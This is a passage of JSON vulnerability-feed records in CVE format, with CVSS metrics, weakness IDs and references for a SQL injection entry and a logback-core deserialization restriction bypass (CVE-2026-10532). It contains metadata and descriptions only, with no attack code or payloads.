V2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:P/I:P/A:P","baseScore":7.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"HIGH","exploitabilityScore":10.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/zhengdexu-bot/zhengdexu/issues/2","source":"cna@vuldb.com"},{"url":"https://itsourcecode.com/","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10250","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824047","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367528","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367528/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10532","sourceIdentifier":"vulnerability@ncsc.ch","published":"2026-06-01T13:16:30.340","lastModified":"2026-06-01T13:16:30.340","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection, albeit heavily restricted.\n\nMore precisely, an attacker able to influence serialized data sent to SimpleSocketServer or SimpleSSLSocketServer can instantiate Proxy objects.\n\nAlthough deserialization is heavily restricted by HardenedObjectInputStream and no practical way to achieve remote code execution or significant privilege escalation has been identified, this issue constitutes a bypass of the intended security restrictions.\n\nThis issue affects logback: through 1.5.33 
inclusive."}],"metrics":{"cvssMetricV40":[{"source":"vulnerability@ncsc.ch","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:Green","baseScore":2.9,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"GREEN"}}]},"weaknesses":[{"source":"vulnerability@ncsc.ch","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://logback.qos.ch/news.html#1.5.34","source":"vulnerability@ncsc.ch"}]}}]}